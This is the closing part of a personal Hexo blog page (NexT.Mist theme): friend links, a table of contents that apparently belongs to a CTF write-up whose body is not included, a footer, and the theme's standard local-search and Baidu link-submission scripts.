                    <a href="http://124.223.185.138/" title="noViC4" target="_blank">noViC4</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://blog.ras-al-ghul.cn/" title="RasAlGhul" target="_blank">RasAlGhul</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.cnblogs.com/yesec/" title="烨" target="_blank">烨</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://eeeeeeeeeeeeeeeea.cn/" title="eeee" target="_blank">eeee</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E9%A3%9F%E6%9D%90%E5%A4%8D%E5%88%BB"><span class="nav-number">1.</span> <span class="nav-text">食材复刻</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%A7%BF%E5%8A%BF%E4%B8%80%EF%BC%88%E9%9D%9E%E9%A2%84%E6%9C%9F%EF%BC%89"><span class="nav-number">1.1.</span> <span class="nav-text">姿势一（非预期）</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%A7%BF%E5%8A%BF%E4%BA%8C"><span class="nav-number">1.2.</span> <span class="nav-text">姿势二</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E8%8F%9C%E5%8D%95%E4%B8%8A%E6%96%B0"><span class="nav-number">2.</span> <span class="nav-text">菜单上新</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; 2021 &mdash; <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-terminal"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">M1sery</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 劲爆出击</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Mist</a></div>




        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  

  
    <span class="site-pv">
      <i class="fa fa-eye"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      
    </span>
  
</div>








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';        
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>


  
  

  

  

  

</body>
</html>
